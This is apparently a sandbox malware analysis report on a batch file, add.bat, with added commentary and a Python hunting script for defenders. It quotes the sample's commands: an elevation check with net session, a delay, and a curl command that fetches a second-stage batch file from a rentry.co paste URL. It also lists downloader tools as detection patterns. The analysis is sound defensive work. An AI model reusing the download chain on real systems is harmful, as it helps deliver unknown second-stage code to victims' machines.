Malware Analysis Report

2024-11-16 15:44

Sample ID 241104-1h113sybpr
Target add.bat
SHA256 c8badf0124a182162b24435e0d435bee500017573cb5e75ef6cc5f418f91cf4b
Tags
score
1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

c8badf0124a182162b24435e0d435bee500017573cb5e75ef6cc5f418f91cf4b

Threat Level: No (potentially) malicious behavior was detected

The file add.bat was found to be: No (potentially) malicious behavior was detected. This verdict reflects the sandbox's signature scoring only. The Windows 10 run (behavioral2) shows the script checking for elevation with net session, sleeping four seconds, and then using curl.exe to fetch a second batch file from rentry.co into C:\Users\Admin\AppData\Local\Temp\bins\upz.bat. No process in this report runs that downloaded file and its contents are not analyzed here, so the 1/10 score should not be read as a clean result for the sample's full behavior.

Malicious Activity Summary

Delays execution with timeout.exe (timeout /t 4, a four-second sleep before the next step)

Runs net.exe (net session, which fails with access denied unless the script is running elevated, so it doubles as an administrator check)

Suspicious use of WriteProcessMemory (cmd.exe writing into the children it spawns, and net.exe into net1.exe; this fires for every parent/child pair in the process tree and is consistent with ordinary process creation rather than injection into an unrelated process)

Not flagged by any signature but visible in behavioral2: curl.exe downloads a second batch file from https://rentry.co/bvkohnim/raw (see the Processes, Network and Files sections of that run).

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-11-04 21:39

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 21:39

Reported

2024-11-04 21:40

Platform

win7-20240903-en

Max time kernel

51s

Max time network

17s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

Signatures

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2364 (3 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2364 wrote to memory of 2776 (3 events) N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2236 wrote to memory of 2912 (3 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\timeout.exe

timeout /t 4

Network

N/A (no traffic was observed in this run; curl.exe does not ship with Windows 7, so the download step seen in the Windows 10 run has nothing to execute here, which matches the absence of a curl.exe process above)

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 21:39

Reported

2024-11-04 21:40

Platform

win10v2004-20241007-en

Max time kernel

16s

Max time network

18s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

Signatures

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 4416 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 4416 wrote to memory of 1564 (2 events) N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 4068 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2480 wrote to memory of 1164 (2 events) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\system32\curl.exe

curl -s -o upz.bat https://rentry.co/bvkohnim/raw

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.75.40:443 rentry.co tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 40.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp

Only the rentry.co rows (DNS lookup, then TLS to 172.67.75.40:443) are attributable to the sample; they correspond to the curl.exe command in the process list. The g.bing.com and c.pki.goog rows and the in-addr.arpa reverse lookups are background traffic of the Windows 10 guest (Microsoft telemetry and Google certificate-status fetches) and should not be used as indicators for this sample.
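
The following is an added example, not output of the sandbox or code from the report. It rebuilds the behavioral2 process chain from constructed process-creation events (PIDs taken from this report; the parent PID 1000 of cmd.exe is assumed), flags the three-step pattern seen here (net session as an elevation check, timeout as a delay, curl as a downloader), and then marks which rows of the network table the download explains. The extra downloader names certutil.exe and bitsadmin.exe, and the paste-site list, are assumptions that generalize beyond this sample.

```python
"""Hunt for the elevation-check / delay / download chain reported for add.bat
and attribute network rows to it.  All input below is constructed from the
report's process list and network table; it is not sandbox output."""
import re
from urllib.parse import urlparse

# Constructed process-creation events: (pid, ppid, image, command line).
EVENTS = [
    (2480, 1000, r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\add.bat"'),
    (4416, 2480, r"C:\Windows\system32\net.exe", "net session"),
    (1564, 4416, r"C:\Windows\system32\net1.exe", r"C:\Windows\system32\net1 session"),
    (4068, 2480, r"C:\Windows\system32\timeout.exe", "timeout /t 4"),
    (1164, 2480, r"C:\Windows\system32\curl.exe",
     "curl -s -o upz.bat https://rentry.co/bvkohnim/raw"),
]

# Constructed subset of the network table: (country, destination, domain, proto).
NETWORK = [
    ("US", "8.8.8.8:53", "g.bing.com", "udp"),
    ("US", "150.171.27.10:443", "g.bing.com", "tcp"),
    ("US", "8.8.8.8:53", "rentry.co", "udp"),
    ("US", "172.67.75.40:443", "rentry.co", "tcp"),
    ("US", "8.8.8.8:53", "c.pki.goog", "udp"),
    ("GB", "142.250.187.227:80", "c.pki.goog", "tcp"),
]

# Assumption: built-in tools commonly used to fetch a second stage.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def batch_launchers(events):
    """cmd.exe processes whose command line ends in a .bat file."""
    return [e for e in events
            if basename(e[2]) == "cmd.exe" and re.search(r'\.bat"?\s*$', e[3], re.I)]


def analyze(events):
    """Return (kind, pid, detail) findings for the children of each batch launcher."""
    findings = []
    for root in batch_launchers(events):
        for pid, ppid, image, cl in events:
            if ppid != root[0]:
                continue
            name = basename(image)
            if name == "net.exe" and re.fullmatch(r"net\s+session\s*", cl, re.I):
                # 'net session' fails unless elevated: the classic batch-file admin check.
                findings.append(("elevation_check", pid, "net session"))
            elif name == "timeout.exe":
                m = re.search(r"/t\s+(\d+)", cl, re.I)
                findings.append(("delay", pid, int(m.group(1)) if m else None))
            elif name in DOWNLOADERS:
                toks = cl.split()
                url = next((t for t in toks if t.lower().startswith(("http://", "https://"))), None)
                # curl's -o <file>: where the fetched content lands (relative to the CWD).
                out = toks[toks.index("-o") + 1] if "-o" in toks and toks.index("-o") + 1 < len(toks) else None
                host = urlparse(url).hostname if url else None
                findings.append(("download", pid, {"host": host, "output": out}))
    return findings


def attribute_network(findings, network):
    """Map each domain in the network table to 'sample' when a download finding
    names it, otherwise 'unattributed' (background traffic until proven otherwise)."""
    sample_hosts = {f[2]["host"] for f in findings if f[0] == "download" and f[2]["host"]}
    return {domain: ("sample" if domain in sample_hosts else "unattributed")
            for _, _, domain, _ in network}


if __name__ == "__main__":
    found = analyze(EVENTS)
    for f in found:
        print(f)
    print(attribute_network(found, NETWORK))
```

Run as-is it prints the three findings and marks only rentry.co as sample traffic; pointing `EVENTS` and `NETWORK` at exported EDR process and DNS events gives the same triage for a real host.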

Files

C:\Users\Admin\AppData\Local\Temp\bins\upz.bat

MD5 9068e2de4ddd34f42b793c7da0658e90
SHA1 5cfebfdec1a285c2a6e33c9371aba378edac1c0e
SHA256 8fc6a68f2044da3a872ddaef933b2c97d84d547b93b6f677ad42c3cd236ae46d
SHA512 cd2648b983e6f792c87692d0a483d9fd7dd1233a0ad012eb1ccd7ee1d097d1062927b2d82c45e3466178d2e9030b55399e5faff7f1ca1097f78862e95089bcb4

This is the file written by curl -s -o upz.bat. The command names a relative path, yet the file appears under the bins subdirectory of Temp, so the script's working directory was Temp\bins when curl ran. The report does not include the contents of upz.bat or any process executing it; the hashes above are the pivot for looking it up separately.